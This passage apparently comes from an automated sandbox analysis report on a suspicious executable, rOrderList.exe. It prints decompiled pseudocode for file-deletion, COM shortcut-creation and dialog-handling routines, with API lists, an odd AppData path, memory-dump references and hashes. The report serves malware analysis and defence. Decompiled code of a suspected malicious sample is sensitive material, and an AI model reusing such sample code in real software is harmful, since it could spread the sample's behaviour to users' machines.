                                                                                      						} while (_t55 != 0);
                                                                                      						_t38 = FindClose(_t70);
                                                                                      						goto L26;
                                                                                      					}
                                                                                      					__eflags =  *0x425750 - 0x5c;
                                                                                      					if( *0x425750 != 0x5c) {
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					goto L10;
                                                                                      				} else {
                                                                                      					__eflags = _t38;
                                                                                      					if(_t38 == 0) {
                                                                                      						L28:
                                                                                      						__eflags = _a4;
                                                                                      						if(_a4 == 0) {
                                                                                      							L36:
                                                                                      							return _t38;
                                                                                      						}
                                                                                      						__eflags = _v12;
                                                                                      						if(_v12 != 0) {
                                                                                      							_t38 = E0040689A(_t68);
                                                                                      							__eflags = _t38;
                                                                                      							if(_t38 == 0) {
                                                                                      								goto L36;
                                                                                      							}
                                                                                      							E00405E11(_t68);
                                                                                      							_t38 = E00405C06(__eflags, _t68, _v8 | 0x00000001);
                                                                                      							__eflags = _t38;
                                                                                      							if(_t38 != 0) {
                                                                                      								return E004055A4(0xffffffe5, _t68);
                                                                                      							}
                                                                                      							__eflags = _v8;
                                                                                      							if(_v8 == 0) {
                                                                                      								goto L30;
                                                                                      							}
                                                                                      							E004055A4(0xfffffff1, _t68);
                                                                                      							return E00406302(_t67, _t68, 0);
                                                                                      						}
                                                                                      						L30:
                                                                                      						 *0x42a308 =  *0x42a308 + 1;
                                                                                      						return _t38;
                                                                                      					}
                                                                                      					__eflags = _t65 & 0x00000002;
                                                                                      					if((_t65 & 0x00000002) == 0) {
                                                                                      						goto L28;
                                                                                      					}
                                                                                      					goto L5;
                                                                                      				}
                                                                                      			}


















                                                                                      0x00405c58
                                                                                      0x00405c5d
                                                                                      0x00405c66
                                                                                      0x00405c69
                                                                                      0x00405c71
                                                                                      0x00405c74
                                                                                      0x00405c77
                                                                                      0x00405c7f
                                                                                      0x00405c81
                                                                                      0x00405c82
                                                                                      0x00000000
                                                                                      0x00405c82
                                                                                      0x00405c8d
                                                                                      0x00405c90
                                                                                      0x00405c90
                                                                                      0x00405c90
                                                                                      0x00405c94
                                                                                      0x00405ca7
                                                                                      0x00405cae
                                                                                      0x00405cb3
                                                                                      0x00405cb7
                                                                                      0x00405cc7
                                                                                      0x00405cb9
                                                                                      0x00405cbf
                                                                                      0x00405cbf
                                                                                      0x00405ccc
                                                                                      0x00405cd0
                                                                                      0x00405cdc
                                                                                      0x00405ce2
                                                                                      0x00405ce7
                                                                                      0x00405ced
                                                                                      0x00405cf8
                                                                                      0x00405cfe
                                                                                      0x00405d00
                                                                                      0x00405d03
                                                                                      0x00405dad
                                                                                      0x00405dad
                                                                                      0x00405db1
                                                                                      0x00405db3
                                                                                      0x00405db3
                                                                                      0x00405db3
                                                                                      0x00405db3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405d09
                                                                                      0x00405d09
                                                                                      0x00405d09
                                                                                      0x00405d11
                                                                                      0x00405d31
                                                                                      0x00405d39
                                                                                      0x00405d3e
                                                                                      0x00405d45
                                                                                      0x00405d60
                                                                                      0x00405d65
                                                                                      0x00405d67
                                                                                      0x00405d8b
                                                                                      0x00405d69
                                                                                      0x00405d69
                                                                                      0x00405d6c
                                                                                      0x00405d80
                                                                                      0x00405d6e
                                                                                      0x00405d71
                                                                                      0x00405d79
                                                                                      0x00405d79
                                                                                      0x00405d6c
                                                                                      0x00405d47
                                                                                      0x00405d4d
                                                                                      0x00405d4f
                                                                                      0x00405d55
                                                                                      0x00405d55
                                                                                      0x00405d4f
                                                                                      0x00000000
                                                                                      0x00405d45
                                                                                      0x00405d13
                                                                                      0x00405d1b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405d1d
                                                                                      0x00405d25
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405d27
                                                                                      0x00405d2f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405d90
                                                                                      0x00405d98
                                                                                      0x00405d9e
                                                                                      0x00405d9e
                                                                                      0x00405da7
                                                                                      0x00000000
                                                                                      0x00405da7
                                                                                      0x00405cd2
                                                                                      0x00405cda
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405c96
                                                                                      0x00405c96
                                                                                      0x00405c98
                                                                                      0x00405db8
                                                                                      0x00405dba
                                                                                      0x00405dbd
                                                                                      0x00405e0e
                                                                                      0x00405e0e
                                                                                      0x00405e0e
                                                                                      0x00405dbf
                                                                                      0x00405dc2
                                                                                      0x00405dcd
                                                                                      0x00405dd2
                                                                                      0x00405dd4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405dd7
                                                                                      0x00405de3
                                                                                      0x00405de8
                                                                                      0x00405dea
                                                                                      0x00000000
                                                                                      0x00405e05
                                                                                      0x00405dec
                                                                                      0x00405def
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405df4
                                                                                      0x00000000
                                                                                      0x00405dfb
                                                                                      0x00405dc4
                                                                                      0x00405dc4
                                                                                      0x00000000
                                                                                      0x00405dc4
                                                                                      0x00405c9e
                                                                                      0x00405ca1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405ca1

                                                                                      APIs
                                                                                      • DeleteFileW.KERNEL32(?,?,77253420,77252EE0,00000000), ref: 00405C77
                                                                                      • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405CBF
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405CE2
                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,77253420,77252EE0,00000000), ref: 00405CE8
                                                                                      • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,77253420,77252EE0,00000000), ref: 00405CF8
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D98
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405DA7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\rOrderList.exe"$PWB$\*.*
                                                                                      • API String ID: 2035342205-1599946533
                                                                                      • Opcode ID: c76c29a0fc8331ff1a360e61f40128e90f72ff2adf79a73f237446a8d29c83a3
                                                                                      • Instruction ID: 388f2befc2087cc18a81576ce5b748581f321be521e7d033b0a51c5b8adb9818
                                                                                      • Opcode Fuzzy Hash: c76c29a0fc8331ff1a360e61f40128e90f72ff2adf79a73f237446a8d29c83a3
                                                                                      • Instruction Fuzzy Hash: C141CF30800A14BADB21AB65DC8DABF7678EF41718F50813BF841B51D1D77C4A82DEAE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 67%
                                                                                      			E004021A2(void* __eflags) {
                                                                                      				signed int _t52;
                                                                                      				void* _t56;
                                                                                      				intOrPtr* _t60;
                                                                                      				intOrPtr _t61;
                                                                                      				intOrPtr* _t62;
                                                                                      				intOrPtr* _t64;
                                                                                      				intOrPtr* _t66;
                                                                                      				intOrPtr* _t68;
                                                                                      				intOrPtr* _t70;
                                                                                      				intOrPtr* _t72;
                                                                                      				intOrPtr* _t74;
                                                                                      				intOrPtr* _t76;
                                                                                      				intOrPtr* _t78;
                                                                                      				intOrPtr* _t80;
                                                                                      				void* _t83;
                                                                                      				intOrPtr* _t91;
                                                                                      				signed int _t101;
                                                                                      				signed int _t105;
                                                                                      				void* _t107;
                                                                                      
                                                                                      				 *((intOrPtr*)(_t107 - 0x10)) = E00402D3E(0xfffffff0);
                                                                                      				 *((intOrPtr*)(_t107 - 0x44)) = E00402D3E(0xffffffdf);
                                                                                      				 *((intOrPtr*)(_t107 - 8)) = E00402D3E(2);
                                                                                      				 *((intOrPtr*)(_t107 - 0x4c)) = E00402D3E(0xffffffcd);
                                                                                      				 *((intOrPtr*)(_t107 - 0xc)) = E00402D3E(0x45);
                                                                                      				_t52 =  *(_t107 - 0x20);
                                                                                      				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                                      				_t101 = _t52 & 0x00008000;
                                                                                      				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                      				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                      				if(E00405E88( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                                      					E00402D3E(0x21);
                                                                                      				}
                                                                                      				_t56 = _t107 + 8;
                                                                                      				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                                                      				if(_t56 < _t83) {
                                                                                      					L14:
                                                                                      					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                      					_push(0xfffffff0);
                                                                                      				} else {
                                                                                      					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                      					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                                                      					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                                      					if(_t61 >= _t83) {
                                                                                      						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                                      						if(_t101 == _t83) {
                                                                                      							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                      							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Interpartesforhold\\Strengelege\\Willness");
                                                                                      						}
                                                                                      						if(_t105 != _t83) {
                                                                                      							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                      							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                      						}
                                                                                      						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                                      						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                                      						if( *_t91 != _t83) {
                                                                                      							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                      							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                                      						}
                                                                                      						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                      						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                      						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                      							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                      							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                                      						}
                                                                                      						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                      						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                      					}
                                                                                      					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                      					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                      					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                      						_push(0xfffffff4);
                                                                                      					} else {
                                                                                      						goto L14;
                                                                                      					}
                                                                                      				}
                                                                                      				E00401423();
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t107 - 4));
                                                                                      				return 0;
                                                                                      			}






















                                                                                      0x004021ab
                                                                                      0x004021b5
                                                                                      0x004021bf
                                                                                      0x004021c9
                                                                                      0x004021d4
                                                                                      0x004021d7
                                                                                      0x004021f1
                                                                                      0x004021f4
                                                                                      0x004021fa
                                                                                      0x004021fd
                                                                                      0x00402207
                                                                                      0x0040220b
                                                                                      0x0040220b
                                                                                      0x00402210
                                                                                      0x00402221
                                                                                      0x00402229
                                                                                      0x004022e0
                                                                                      0x004022e0
                                                                                      0x004022e7
                                                                                      0x0040222f
                                                                                      0x0040222f
                                                                                      0x0040223e
                                                                                      0x00402242
                                                                                      0x00402245
                                                                                      0x0040224b
                                                                                      0x00402259
                                                                                      0x0040225c
                                                                                      0x0040225e
                                                                                      0x00402269
                                                                                      0x00402269
                                                                                      0x0040226e
                                                                                      0x00402270
                                                                                      0x00402277
                                                                                      0x00402277
                                                                                      0x0040227a
                                                                                      0x00402283
                                                                                      0x00402286
                                                                                      0x0040228c
                                                                                      0x0040228e
                                                                                      0x00402298
                                                                                      0x00402298
                                                                                      0x0040229b
                                                                                      0x004022a4
                                                                                      0x004022a7
                                                                                      0x004022b0
                                                                                      0x004022b6
                                                                                      0x004022b8
                                                                                      0x004022c6
                                                                                      0x004022c6
                                                                                      0x004022c9
                                                                                      0x004022cf
                                                                                      0x004022cf
                                                                                      0x004022d2
                                                                                      0x004022d8
                                                                                      0x004022de
                                                                                      0x004022f3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004022de
                                                                                      0x004022e9
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Willness, xrefs: 00402261
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID: C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Willness
                                                                                      • API String ID: 542301482-1530807281
                                                                                      • Opcode ID: b25282a8798a2ff3bd7ff6f31452890546f4edcfc94c4a7aadb2cb05dee97700
                                                                                      • Instruction ID: 3a0b8fa6945436ea0e4cb0e043321d643ed21fd69d70badd8d93d2b131f18866
                                                                                      • Opcode Fuzzy Hash: b25282a8798a2ff3bd7ff6f31452890546f4edcfc94c4a7aadb2cb05dee97700
                                                                                      • Instruction Fuzzy Hash: C9412775A00209AFCF00DFE4C989A9E7BB6FF48304B20457AF915EB2D1DB799981CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 96%
                                                                                      			E00404EFF(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                      				struct HWND__* _v8;
                                                                                      				struct HWND__* _v12;
                                                                                      				long _v16;
                                                                                      				signed int _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				signed char* _v28;
                                                                                      				int _v32;
                                                                                      				void* _v36;
                                                                                      				signed int _v44;
                                                                                      				int _v48;
                                                                                      				signed int* _v60;
                                                                                      				signed char* _v64;
                                                                                      				signed int _v68;
                                                                                      				long _v72;
                                                                                      				void* _v76;
                                                                                      				intOrPtr _v80;
                                                                                      				intOrPtr _v84;
                                                                                      				void* _v88;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				struct HWND__* _t191;
                                                                                      				signed int _t203;
                                                                                      				void* _t206;
                                                                                      				long _t212;
                                                                                      				signed int _t216;
                                                                                      				signed int _t227;
                                                                                      				void* _t230;
                                                                                      				void* _t231;
                                                                                      				int _t237;
                                                                                      				long _t242;
                                                                                      				long _t243;
                                                                                      				signed int _t244;
                                                                                      				signed int _t249;
                                                                                      				signed int _t251;
                                                                                      				signed char _t252;
                                                                                      				signed char _t260;
                                                                                      				void* _t265;
                                                                                      				void* _t267;
                                                                                      				signed char* _t285;
                                                                                      				signed char _t286;
                                                                                      				long _t291;
                                                                                      				void* _t298;
                                                                                      				signed int* _t299;
                                                                                      				int _t300;
                                                                                      				long _t301;
                                                                                      				int _t303;
                                                                                      				long _t304;
                                                                                      				int _t305;
                                                                                      				signed int _t306;
                                                                                      				signed int _t309;
                                                                                      				signed int _t316;
                                                                                      				signed char* _t324;
                                                                                      				int _t329;
                                                                                      				void* _t331;
                                                                                      
                                                                                      				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                      				_t191 = GetDlgItem(_a4, 0x408);
                                                                                      				_t298 =  *0x42a2a8;
                                                                                      				_t331 = SendMessageW;
                                                                                      				_v8 = _t191;
                                                                                      				_v36 = _t298;
                                                                                      				_v24 =  *0x42a274 + 0x94;
                                                                                      				if(_a8 != 0x110) {
                                                                                      					L23:
                                                                                      					if(_a8 != 0x405) {
                                                                                      						_t307 = _a16;
                                                                                      					} else {
                                                                                      						_a12 = 0;
                                                                                      						_t307 = 1;
                                                                                      						_a8 = 0x40f;
                                                                                      						_a16 = 1;
                                                                                      					}
                                                                                      					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                      						_v16 = _t307;
                                                                                      						if(_a8 == 0x413 ||  *((intOrPtr*)(_t307 + 4)) == 0x408) {
                                                                                      							if(( *0x42a27d & 0x00000002) != 0) {
                                                                                      								L41:
                                                                                      								if(_v16 != 0) {
                                                                                      									_t242 = _v16;
                                                                                      									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe3d) {
                                                                                      										SendMessageW(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                                                      									}
                                                                                      									_t243 = _v16;
                                                                                      									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe39) {
                                                                                      										_t244 =  *(_t243 + 0x5c);
                                                                                      										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                                                      											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) & 0xffffffdf;
                                                                                      										} else {
                                                                                      											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) | 0x00000020;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								goto L48;
                                                                                      							}
                                                                                      							if(_a8 == 0x413) {
                                                                                      								L33:
                                                                                      								_t307 = 0 | _a8 != 0x00000413;
                                                                                      								_t249 = E00404E4D(_v8, _a8 != 0x413);
                                                                                      								_v20 = _t249;
                                                                                      								if(_t249 >= 0) {
                                                                                      									_t100 = _t298 + 8; // 0x8
                                                                                      									_t307 = _t249 * 0x818 + _t100;
                                                                                      									_t251 =  *_t307;
                                                                                      									if((_t251 & 0x00000010) == 0) {
                                                                                      										if((_t251 & 0x00000040) == 0) {
                                                                                      											_t252 = _t251 ^ 0x00000001;
                                                                                      										} else {
                                                                                      											_t260 = _t251 ^ 0x00000080;
                                                                                      											if(_t260 >= 0) {
                                                                                      												_t252 = _t260 & 0x000000fe;
                                                                                      											} else {
                                                                                      												_t252 = _t260 | 0x00000001;
                                                                                      											}
                                                                                      										}
                                                                                      										 *_t307 = _t252;
                                                                                      										E0040117D(_v20);
                                                                                      										_a8 = 0x40f;
                                                                                      										_a12 = _v20 + 1;
                                                                                      										_a16 =  !( *0x42a27c) >> 0x00000008 & 0x00000001;
                                                                                      									}
                                                                                      								}
                                                                                      								goto L41;
                                                                                      							}
                                                                                      							_t307 = _a16;
                                                                                      							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                      								goto L41;
                                                                                      							}
                                                                                      							goto L33;
                                                                                      						} else {
                                                                                      							goto L48;
                                                                                      						}
                                                                                      					} else {
                                                                                      						L48:
                                                                                      						if(_a8 != 0x111) {
                                                                                      							L56:
                                                                                      							if(_a8 == 0x200) {
                                                                                      								SendMessageW(_v8, 0x200, 0, 0);
                                                                                      							}
                                                                                      							if(_a8 == 0x40b) {
                                                                                      								_t230 =  *0x42372c;
                                                                                      								if(_t230 != 0) {
                                                                                      									ImageList_Destroy(_t230);
                                                                                      								}
                                                                                      								_t231 =  *0x423740;
                                                                                      								if(_t231 != 0) {
                                                                                      									GlobalFree(_t231);
                                                                                      								}
                                                                                      								 *0x42372c = 0;
                                                                                      								 *0x423740 = 0;
                                                                                      								 *0x42a2e0 = 0;
                                                                                      							}
                                                                                      							if(_a8 != 0x40f) {
                                                                                      								L90:
                                                                                      								if(_a8 == 0x420 && ( *0x42a27d & 0x00000001) != 0) {
                                                                                      									_t329 = (0 | _a16 == 0x00000020) << 3;
                                                                                      									ShowWindow(_v8, _t329);
                                                                                      									ShowWindow(GetDlgItem(_a4, 0x3fe), _t329);
                                                                                      								}
                                                                                      								goto L93;
                                                                                      							} else {
                                                                                      								E004011EF(_t307, 0, 0);
                                                                                      								_t203 = _a12;
                                                                                      								if(_t203 != 0) {
                                                                                      									if(_t203 != 0xffffffff) {
                                                                                      										_t203 = _t203 - 1;
                                                                                      									}
                                                                                      									_push(_t203);
                                                                                      									_push(8);
                                                                                      									E00404ECD();
                                                                                      								}
                                                                                      								if(_a16 == 0) {
                                                                                      									L75:
                                                                                      									E004011EF(_t307, 0, 0);
                                                                                      									_v36 =  *0x423740;
                                                                                      									_t206 =  *0x42a2a8;
                                                                                      									_v64 = 0xf030;
                                                                                      									_v20 = 0;
                                                                                      									if( *0x42a2ac <= 0) {
                                                                                      										L86:
                                                                                      										if( *0x42a26c == 4) {
                                                                                      											InvalidateRect(_v8, 0, 1);
                                                                                      										}
                                                                                      										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                                                      											E00404E08(0x3ff, 0xfffffffb, E00404E20(5));
                                                                                      										}
                                                                                      										goto L90;
                                                                                      									}
                                                                                      									_t299 = _t206 + 8;
                                                                                      									do {
                                                                                      										_t212 =  *((intOrPtr*)(_v36 + _v20 * 4));
                                                                                      										if(_t212 != 0) {
                                                                                      											_t309 =  *_t299;
                                                                                      											_v72 = _t212;
                                                                                      											_v76 = 8;
                                                                                      											if((_t309 & 0x00000001) != 0) {
                                                                                      												_v76 = 9;
                                                                                      												_v60 =  &(_t299[4]);
                                                                                      												_t299[0] = _t299[0] & 0x000000fe;
                                                                                      											}
                                                                                      											if((_t309 & 0x00000040) == 0) {
                                                                                      												_t216 = (_t309 & 0x00000001) + 1;
                                                                                      												if((_t309 & 0x00000010) != 0) {
                                                                                      													_t216 = _t216 + 3;
                                                                                      												}
                                                                                      											} else {
                                                                                      												_t216 = 3;
                                                                                      											}
                                                                                      											_v68 = (_t216 << 0x0000000b | _t309 & 0x00000008) + (_t216 << 0x0000000b | _t309 & 0x00000008) | _t309 & 0x00000020;
                                                                                      											SendMessageW(_v8, 0x1102, (_t309 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                      											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                                      										}
                                                                                      										_v20 = _v20 + 1;
                                                                                      										_t299 =  &(_t299[0x206]);
                                                                                      									} while (_v20 <  *0x42a2ac);
                                                                                      									goto L86;
                                                                                      								} else {
                                                                                      									_t300 = E004012E2( *0x423740);
                                                                                      									E00401299(_t300);
                                                                                      									_t227 = 0;
                                                                                      									_t307 = 0;
                                                                                      									if(_t300 <= 0) {
                                                                                      										L74:
                                                                                      										SendMessageW(_v12, 0x14e, _t307, 0);
                                                                                      										_a16 = _t300;
                                                                                      										_a8 = 0x420;
                                                                                      										goto L75;
                                                                                      									} else {
                                                                                      										goto L71;
                                                                                      									}
                                                                                      									do {
                                                                                      										L71:
                                                                                      										if( *((intOrPtr*)(_v24 + _t227 * 4)) != 0) {
                                                                                      											_t307 = _t307 + 1;
                                                                                      										}
                                                                                      										_t227 = _t227 + 1;
                                                                                      									} while (_t227 < _t300);
                                                                                      									goto L74;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                      							goto L93;
                                                                                      						} else {
                                                                                      							_t237 = SendMessageW(_v12, 0x147, 0, 0);
                                                                                      							if(_t237 == 0xffffffff) {
                                                                                      								goto L93;
                                                                                      							}
                                                                                      							_t301 = SendMessageW(_v12, 0x150, _t237, 0);
                                                                                      							if(_t301 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t301 * 4)) == 0) {
                                                                                      								_t301 = 0x20;
                                                                                      							}
                                                                                      							E00401299(_t301);
                                                                                      							SendMessageW(_a4, 0x420, 0, _t301);
                                                                                      							_a12 = _a12 | 0xffffffff;
                                                                                      							_a16 = 0;
                                                                                      							_a8 = 0x40f;
                                                                                      							goto L56;
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					 *0x42a2e0 = _a4;
                                                                                      					_t303 = 2;
                                                                                      					_v32 = 0;
                                                                                      					_v20 = _t303;
                                                                                      					 *0x423740 = GlobalAlloc(0x40,  *0x42a2ac << 2);
                                                                                      					_t265 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                                                      					 *0x423734 =  *0x423734 | 0xffffffff;
                                                                                      					_v16 = _t265;
                                                                                      					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E00405518);
                                                                                      					_t267 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                      					 *0x42372c = _t267;
                                                                                      					ImageList_AddMasked(_t267, _v16, 0xff00ff);
                                                                                      					SendMessageW(_v8, 0x1109, _t303,  *0x42372c);
                                                                                      					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                      						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                      					}
                                                                                      					DeleteObject(_v16);
                                                                                      					_t304 = 0;
                                                                                      					do {
                                                                                      						_t273 =  *((intOrPtr*)(_v24 + _t304 * 4));
                                                                                      						if( *((intOrPtr*)(_v24 + _t304 * 4)) != 0) {
                                                                                      							if(_t304 != 0x20) {
                                                                                      								_v20 = 0;
                                                                                      							}
                                                                                      							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406579(_t304, 0, _t331, 0, _t273)), _t304);
                                                                                      						}
                                                                                      						_t304 = _t304 + 1;
                                                                                      					} while (_t304 < 0x21);
                                                                                      					_t305 = _a16;
                                                                                      					_push( *((intOrPtr*)(_t305 + 0x30 + _v20 * 4)));
                                                                                      					_push(0x15);
                                                                                      					E00404492(_a4);
                                                                                      					_push( *((intOrPtr*)(_t305 + 0x34 + _v20 * 4)));
                                                                                      					_push(0x16);
                                                                                      					E00404492(_a4);
                                                                                      					_t306 = 0;
                                                                                      					_v16 = 0;
                                                                                      					if( *0x42a2ac <= 0) {
                                                                                      						L19:
                                                                                      						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                      						goto L20;
                                                                                      					} else {
                                                                                      						_t324 = _v36 + 8;
                                                                                      						_v28 = _t324;
                                                                                      						do {
                                                                                      							_t285 =  &(_t324[0x10]);
                                                                                      							if( *_t285 != 0) {
                                                                                      								_v64 = _t285;
                                                                                      								_t286 =  *_t324;
